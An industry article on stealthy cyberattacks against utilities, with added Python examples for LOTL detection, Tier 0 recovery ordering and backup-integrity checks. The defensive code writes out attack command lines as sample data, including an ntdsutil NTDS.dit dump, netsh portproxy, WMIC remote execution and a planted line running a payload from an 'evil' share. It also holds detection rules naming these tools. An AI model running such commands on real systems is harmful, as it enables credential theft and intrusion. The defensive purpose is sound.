The Biggest Threat to Critical Infrastructure Is the One You Can’t See

Federal agencies are warning of a growing wave of stealth cyberattacks on U.S. utilities. From Volt Typhoon to low-bar hackers, the message is clear: resilience, not perimeter defense, must define the future of critical infrastructure protection.
Oct. 29, 2025

Key Highlights

  • Critical infrastructure systems are increasingly targeted by sophisticated cyberattacks, often going undetected for long periods.
  • Many utilities rely on outdated security measures, making them vulnerable to stealthy, long-term infiltration by nation-state actors and cybercriminals.
  • Recent government advisories stress the importance of prioritizing 'Tier 0' systems like identity providers for effective incident response and recovery.
  • Attackers use legitimate tools and credentials to blend in with normal operations, making traditional detection methods ineffective.
  • A proactive resilience strategy, including regular crisis simulations and secure backup practices, is essential to protect critical services and national security.

Flip a switch on the wall, and the lights turn on. Turn on your kitchen faucet, and water comes out. These are basic amenities: things we take for granted and would struggle to live without. They are a part of the critical infrastructure that operates silently in the background, keeping our lives on track. The fact that these services have remained reliable and available for generations is a testament to decades of hard work and ingenious engineering. But what has taken decades to build and maintain can be destroyed in a matter of moments. 

Just beneath the surface, a growing concern exists around the critical infrastructure that underpins much of our day-to-day lives. That concern stems from an incontrovertible fact: cybercriminals and nation-state actors are already inside these essential systems, lying dormant and waiting for the most opportune moment to strike. A recent Semperis report analyzing cyberattacks targeting water and electricity operators across the United States and the United Kingdom found that 62% of utility operators were targeted in the past year. Of those attacked, 80% suffered multiple incidents. More than half (54%) experienced permanent corruption or destruction of data and systems.

These are bleak statistics, and they are getting worse. The stat that concerns me most is that over a third (38%) of utility operators reported not being targeted at all. On its surface, this sounds like good news. But any seasoned cybersecurity pro would hear this and immediately understand what it means: sneakier, more sophisticated attacks by malicious actors are simply going undetected.

Washington Sounds the Alarm

The lurking threat may be under the radar for critical infrastructure organizations, but federal authorities are paying attention. In December 2024, the Cybersecurity and Infrastructure Security Agency (CISA) and the Environmental Protection Agency (EPA) issued a cybersecurity advisory highlighting the persistent threat of cyberattacks on water systems and the dangers posed by both criminal groups and nation-state actors. That notice followed a cybersecurity incident in Arkansas City, Kansas, that forced utility operators to switch to manual operations, a real-world example of how quickly digital compromise can disrupt physical services.

This was not an isolated warning. In May 2025, CISA, the FBI, the EPA and the Department of Energy (DOE) jointly issued another advisory warning that even “unsophisticated” hackers are successfully targeting organizations in the U.S. Oil and Natural Gas sectors. That warning recognized that not all attacks are carried out by nation-states, and that critical infrastructure remains vulnerable to low-bar attackers leveraging poorly secured systems or default credentials.

These advisories underscore a growing consensus in the cybersecurity community: attacks on critical infrastructure are no longer speculative. They are here, persistent, and escalating in both frequency and severity.

The Invisible Threat: Living Off the Land

Unlike headline-grabbing ransomware attacks that trigger immediate alarms, today’s critical infrastructure threats are quieter, making them much more challenging to detect. Sophisticated attackers now leverage legitimate tools and identity credentials to evade detection. By compromising identity systems like Active Directory or Okta, malicious actors can gain long-term access to systems. They blend in and wait patiently for the right moment to strike. There is very little in our industry that’s more dangerous than a false sense of security, and that’s precisely what many companies in the utility sector have. All of this increases the risk that critical systems may be vulnerable to sabotage before defenders even realize they’ve been breached.

The report from Semperis makes it clear: many utilities are already compromised and don't know it. The traditional indicators of compromise, such as ransom notes, system crashes, and exfiltrated data, give way to silent persistence. Quick paydays are passé. Attackers are now prioritizing long-term, strategic disruption. Often, these efforts are supported by nation-state actors with sophisticated capabilities and geopolitical motives.

Look no further than China's Volt Typhoon for an example. Their lack of a calling card is, in fact, their calling card. By quietly penetrating networks and planting backdoors, they gather intelligence for months (or even years) and position the cyber equivalent of bombs to be detonated should it suit their purpose. One example is the Littleton Electric Light and Water Departments (LELWD), the Massachusetts utility breached in 2023 by Chinese state-sponsored hackers: Volt Typhoon infiltrated its systems and remained undetected for nearly a year. The technique that makes this possible is "living off the land" (LOTL). Rather than dropping malware, attackers use the legitimate administrative tools and processes already present on the network (built-in command-line utilities, remote management features, valid accounts), so there is no malicious binary for a signature to match and no beacon for a firewall to block. Malicious activity blends seamlessly with normal administration, and traditional security indicators become ineffective. It has been an effective strategy for groups like Volt Typhoon, and they are by no means the only ones.
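What detection logic for this looks like in practice, as an added example that is not code from the article or from Semperis: the script scans constructed Windows process-creation records (Security event 4688 style) for the built-in tools publicly documented in Volt Typhoon's tradecraft in CISA advisory AA24-038A (ntdsutil, netsh portproxy, vssadmin, wmic) and escalates only when several different LOTL tools run under one principal on one host, because any single command may be a legitimate administrator doing real work. The sample events, the field layout and the escalation threshold are assumptions.

```python
"""Flag living-off-the-land (LOTL) command lines in process-creation telemetry.

Added example, not part of the original article or of any Semperis product.
Input records are constructed, 4688-style (host, user, parent, command line).
Rules cover built-in tools attributed to Volt Typhoon in CISA AA24-038A;
the threshold in correlate_by_principal is an assumption.
"""
import re
from dataclasses import dataclass

# Constructed sample telemetry: (host, user, parent process, command line)
SAMPLE_EVENTS = [
    ("DC01", "CORP\\svc_backup", "cmd.exe",
     "ntdsutil.exe \"ac i ntds\" \"ifm\" \"create full C:\\Windows\\Temp\\pro\" q q"),
    ("HMI-02", "CORP\\operator", "cmd.exe",
     "netsh interface portproxy add v4tov4 listenport=9999 "
     "connectaddress=10.10.5.20 connectport=3389"),
    ("DC01", "CORP\\svc_backup", "cmd.exe",
     "vssadmin create shadow /for=C:"),
    ("JUMP01", "CORP\\admin", "powershell.exe",
     "wmic /node:\"10.10.5.21\" process call create \"cmd /c whoami > C:\\Windows\\Temp\\w.txt\""),
    ("WKS-11", "CORP\\jsmith", "explorer.exe",
     "C:\\Program Files\\Microsoft Office\\root\\Office16\\EXCEL.EXE /automation"),
    ("DC01", "CORP\\svc_backup", "services.exe",
     "C:\\Windows\\System32\\svchost.exe -k netsvcs"),
]

# Each rule: name, regex over the command line, why an analyst should care.
RULES = [
    ("ntds_dump", re.compile(r"\bntdsutil(\.exe)?\b.*\bifm\b", re.I),
     "ntdsutil IFM writes an offline copy of NTDS.dit (domain credential theft)"),
    ("portproxy_pivot", re.compile(r"\bnetsh\b.*\bportproxy\b.*\badd\b", re.I),
     "netsh portproxy turns a host into a relay into the OT or DC network"),
    ("shadow_copy", re.compile(r"\bvssadmin(\.exe)?\b.*\bcreate shadow\b", re.I),
     "a manual shadow copy precedes copying the locked NTDS.dit or SAM"),
    ("wmic_remote_exec", re.compile(r"\bwmic\b.*/node:.*\bprocess call create\b", re.I),
     "WMIC remote process creation is lateral movement with a built-in tool"),
]


@dataclass(frozen=True)
class Finding:
    host: str
    user: str
    rule: str
    reason: str


def detect_lotl(events):
    """Return one Finding per (event, rule) match, in input order."""
    findings = []
    for host, user, _parent, cmdline in events:
        for name, pattern, reason in RULES:
            if pattern.search(cmdline):
                findings.append(Finding(host, user, name, reason))
    return findings


def correlate_by_principal(findings, threshold=2):
    """Group findings by (host, user) and return the principals that tripped at
    least `threshold` distinct rules. One hit may be an admin at work; several
    different LOTL tools under one account on one host is the stronger signal."""
    seen = {}
    for f in findings:
        seen.setdefault((f.host, f.user), set()).add(f.rule)
    return {k: sorted(v) for k, v in seen.items() if len(v) >= threshold}


if __name__ == "__main__":
    hits = detect_lotl(SAMPLE_EVENTS)
    for h in hits:
        print(f"[{h.rule}] {h.host} {h.user}: {h.reason}")
    print("escalate:", correlate_by_principal(hits))
```

Run on the sample, the domain controller's backup service account is the one that gets escalated: it both created a shadow copy and exported NTDS.dit, which is the credential-theft sequence, while the single portproxy and WMIC hits stay as leads to review. The rules key on arguments (`ifm`, `portproxy add`, `process call create`), not on the executable name alone, because the executables themselves are present and legitimately used on every Windows host.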

Unfortunately, most utilities are ill-equipped to battle sophisticated adversaries. Their operational technology (OT) wasn't designed with cybersecurity or internet access in mind, and in many cases hasn't been updated in years. They still rely on outdated tools and practices to detect breaches, such as perimeter monitoring, signature-based antivirus, and legacy SIEM systems that were not built for stealthy, identity-centric attacks. There is no mincing words: their entire approach needs to change.

Proactive Resilience, Not Passive Defense

The status quo for critical infrastructure cyber defense is not good enough. And there are no easy fixes. Unfortunately, it’s not a matter of merely tweaking strategies for better detection or stronger perimeter defense. Security teams need to fundamentally shift toward a proactive resilience strategy based on a simple (but hard-to-swallow) assumption: that compromise has already occurred.

If you can't protect everything, you must prioritize. The first step in this process is to identify "Tier 0" infrastructure: the systems that everything else trusts, and which an attacker who controls them can use to control the rest. These include identity providers like Active Directory and cloud identity platforms, as well as configuration management and backup systems. Organizations should build incident response, crisis management, and recovery planning around these assets. Even if the broader environment is compromised and everything is crumbling around you, the ability to restore Tier 0 infrastructure to a trusted state is foundational to cyber resilience, because every other system is rebuilt on top of it.
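One way to turn a Tier 0 list into a recovery order, as an added example rather than the article's or Semperis' own method: the dependency map below is a constructed, simplified utility environment in which each entry lists what a system needs before it can be trusted and brought back. The planner emits restore waves in which everything a system depends on comes back before the system itself, puts Tier 0 first inside each wave, and flags the planning error of a Tier 0 asset that depends on something outside Tier 0. System names are assumptions.

```python
"""Order recovery of a compromised environment so Tier 0 comes back first.

Added example, not from the article or any Semperis product. The dependency
map is a constructed, simplified utility environment; names are assumptions.
"""
from graphlib import CycleError, TopologicalSorter

# system -> systems it must trust before it can be restored (constructed)
DEPENDENCIES = {
    "ad_forest":     set(),                     # Tier 0: identity
    "pki":           {"ad_forest"},             # Tier 0: certificates
    "backup_server": {"ad_forest", "pki"},      # Tier 0: recovery capability
    "config_mgmt":   {"ad_forest", "backup_server"},
    "cloud_idp":     {"ad_forest"},
    "historian":     {"ad_forest", "config_mgmt"},
    "scada_hmi":     {"historian", "config_mgmt"},
    "billing":       {"cloud_idp"},
}
TIER0 = {"ad_forest", "pki", "backup_server"}


def recovery_plan(deps, tier0):
    """Return the restore order as a list of waves; each wave can be restored in
    parallel once the previous one is verified. Raises ValueError on a cycle,
    which is a plan that can never complete and should be caught in rehearsal."""
    ts = TopologicalSorter(deps)
    try:
        ts.prepare()
    except CycleError as e:
        cycle = e.args[1] if len(e.args) > 1 else e
        raise ValueError(f"dependency cycle: {cycle}") from None
    waves = []
    while ts.is_active():
        # Tier 0 systems first inside a wave so they are validated earliest
        ready = sorted(ts.get_ready(), key=lambda s: (s not in tier0, s))
        waves.append(ready)
        ts.done(*ready)
    return waves


def unresolved_tier0(deps, tier0):
    """Tier 0 systems that depend on something outside Tier 0 cannot be restored
    first; fix this in the plan before a crisis, not during one."""
    return sorted(s for s in tier0 if deps.get(s, set()) - tier0)


if __name__ == "__main__":
    for i, wave in enumerate(recovery_plan(DEPENDENCIES, TIER0), 1):
        print(f"wave {i}: {', '.join(wave)}")
    print("Tier 0 with outside dependencies:", unresolved_tier0(DEPENDENCIES, TIER0))
```

The point of the `unresolved_tier0` check is the common real-world mistake of making the backup server authenticate against something that is itself restored from backup; if the check returns anything, the plan has a hole that only shows up on the day you need it.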


Next, all stakeholders, not just IT and security, must understand the steps to take in a crisis. Recovery processes must be documented and then rehearsed across all departments in simulations of real-world attack scenarios. Cyberattacks put tremendous stress on every department, including security, operations, legal, and communications. You need to test their ability to withstand that pressure and coordinate with each other, and regular rehearsal reinforces this.

Finally, you need to prioritize strategies that ensure recovery is not only fast but also secure. Attackers often attempt to compromise backups to maintain persistence in the environment even after recovery attempts: restoring from a backup that already contains their rogue accounts, modified group policy, or implanted scripts simply reinstates the breach. Backups must therefore be kept offline or immutable and verified against a record the attacker cannot alter before they are trusted. It's critical to identify and deploy solutions that support speed, security, and visibility in crises, and help you quickly re-establish trust in your critical systems.
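The verification step described above in runnable form, as an added example that is not code from the article or from Semperis: a manifest of file hashes is signed with an HMAC key that lives only in an offline vault, and a restore is refused if the manifest signature fails, a file was modified, or a file appears that the manifest never listed. The constructed scenario then shows an attacker altering a config file, implanting a script, and finally re-hashing the implanted file into the manifest, which the signature check rejects. Directory layout, file contents and the key are all constructed for the demo.

```python
"""Verify a backup against an offline-signed manifest before restoring it.

Added example, not from the article or any Semperis product. The signing key
is assumed to come from an offline or HSM-backed vault and never to be stored
on the backup host; everything else here is constructed for the demonstration.
"""
import hashlib
import hmac
import json
import os
import tempfile
from pathlib import Path


def sha256_file(path):
    h = hashlib.sha256()
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(65536), b""):
            h.update(chunk)
    return h.hexdigest()


def _canonical(files):
    # Deterministic encoding so the HMAC covers exactly the same bytes later
    return json.dumps(files, sort_keys=True, separators=(",", ":")).encode()


def build_manifest(backup_dir, signing_key):
    """Hash every file under backup_dir and sign the canonical listing with HMAC.
    Run at backup time; the key is fetched for this call and then discarded."""
    root = Path(backup_dir)
    files = {str(p.relative_to(root)): sha256_file(p)
             for p in sorted(root.rglob("*")) if p.is_file()}
    tag = hmac.new(signing_key, _canonical(files), hashlib.sha256).hexdigest()
    return {"files": files, "hmac": tag}


def verify_backup(backup_dir, manifest, signing_key):
    """Return (ok, problems). Signature first, so a doctored manifest is rejected
    before any file is trusted; then each listed file's hash; then any extra
    files, since an implant added to the backup set is as bad as a changed one."""
    expected = hmac.new(signing_key, _canonical(manifest["files"]), hashlib.sha256).hexdigest()
    if not hmac.compare_digest(expected, manifest["hmac"]):
        return False, ["manifest signature invalid"]
    root = Path(backup_dir)
    present = {str(p.relative_to(root)) for p in root.rglob("*") if p.is_file()}
    problems = []
    for rel, digest in manifest["files"].items():
        if rel not in present:
            problems.append(f"missing: {rel}")
        elif sha256_file(root / rel) != digest:
            problems.append(f"modified: {rel}")
    for rel in sorted(present - manifest["files"].keys()):
        problems.append(f"unexpected: {rel}")
    return not problems, problems


def demo():
    """Constructed scenario: clean backup, then tampering, then a forged manifest."""
    key = os.urandom(32)  # assumption: would come from an offline vault
    with tempfile.TemporaryDirectory() as d:
        root = Path(d)
        (root / "ntds").mkdir()
        (root / "ntds" / "ntds.dit").write_bytes(b"constructed-ad-database")
        (root / "sysvol.conf").write_text("gpo=clean\n")
        manifest = build_manifest(d, key)
        clean = verify_backup(d, manifest, key)
        # Attacker with write access to the backup set
        (root / "sysvol.conf").write_text("gpo=clean\nrun=\\\\evil\\share\\p.exe\n")
        (root / "persist.ps1").write_text("# implant\n")
        tampered = verify_backup(d, manifest, key)
        # Attacker also re-hashes the implant into the manifest, but lacks the key
        forged = {"files": dict(manifest["files"],
                                **{"persist.ps1": sha256_file(root / "persist.ps1")}),
                  "hmac": manifest["hmac"]}
        forged_result = verify_backup(d, forged, key)
    return clean, tampered, forged_result


if __name__ == "__main__":
    for label, result in zip(("clean", "tampered", "forged"), demo()):
        print(label, result)
```

A plain hash list on the backup host would not have caught the third case, since the attacker can recompute hashes; what stops it is that the manifest is authenticated with a key the backup host never holds. In production the same idea is usually provided by object-lock or immutable snapshots plus signed catalogs, but the check to insist on is the same: trust nothing in the backup until its integrity has been proven from outside it.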

Cyber resilience must become the guiding principle of utility cybersecurity strategy, not only to protect operational uptime and public safety, but also to safeguard national stability. Utilities may not be on the frontlines of international conflict, but they are often the first targets of attack. In this high-stakes environment, assuming compromise is not paranoia: it’s prudent planning. Because if your organization hasn’t seen an attack lately, it might not be a sign of safety. It might just mean the attackers are still inside and waiting.

About the Author

Sean Deuby

Principal Technologist, Semperis

Sean Deuby brings over 30 years of experience in enterprise IT and hybrid identity security to his role as Principal Technologist, North America, at Semperis. As an original architect and technical leader of Intel's Active Directory and Texas Instruments’ Windows NT network, and a 15-time MVP alumnus, Sean has been involved with Microsoft identity technology since its inception. His experience as an identity strategy consultant for numerous Fortune 500 companies provides him with a broad perspective on the challenges of today's identity-centered security. Sean is also an industry journalism veteran; as a former technical director for Windows IT Pro, he has over 400 published articles on Active Directory, Azure Active Directory, hybrid identity, and Windows Server.
